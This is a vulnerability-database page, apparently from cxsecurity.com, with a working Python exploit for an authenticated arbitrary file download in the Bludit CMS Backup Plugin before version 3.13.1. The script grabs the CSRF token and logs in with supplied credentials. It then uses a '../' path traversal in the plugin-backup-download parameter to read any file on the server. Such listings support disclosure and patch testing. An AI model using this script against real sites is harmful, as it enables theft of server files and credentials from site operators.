Bludit < 3.13.1 Backup Plugin Arbitrary File Download (Authenticated)

2023.07.11
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# -*- coding: utf-8 -*- #/usr/bin/env python # Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) # Date: 2022-07-21 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: < 3.13.1 # Tested on: Debian 10 - PHP Version: 7.3.14 import requests import argparse from bs4 import BeautifulSoup #pip3 install beautifulsoup4 def main(): parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)') parser.add_argument('-x', '--url', type=str, required=True) parser.add_argument('-u', '--user', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) parser.add_argument('-f', '--file', type=str, required=True) args = parser.parse_args() print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n") exploit(args) def exploit(args): s2 = requests.Session() url = args.url.rstrip("/") #get csrf token r = s2.get(url+'/admin/') soup = BeautifulSoup(r.text, 'html.parser') formtoken = soup.find('input', {'name':'tokenCSRF'})['value'] #login body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password} r = s2.post(url+'/admin/', data=body, allow_redirects=False) if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1): print("[*] Login OK") else: print("[*] Login Failed") exit(1) #arbitrary download r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file) if(r.status_code==200 and len(r.content)>0): print("[*] File:") print(r.text) else: print("[*] Exploit Failed") exit(1) if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top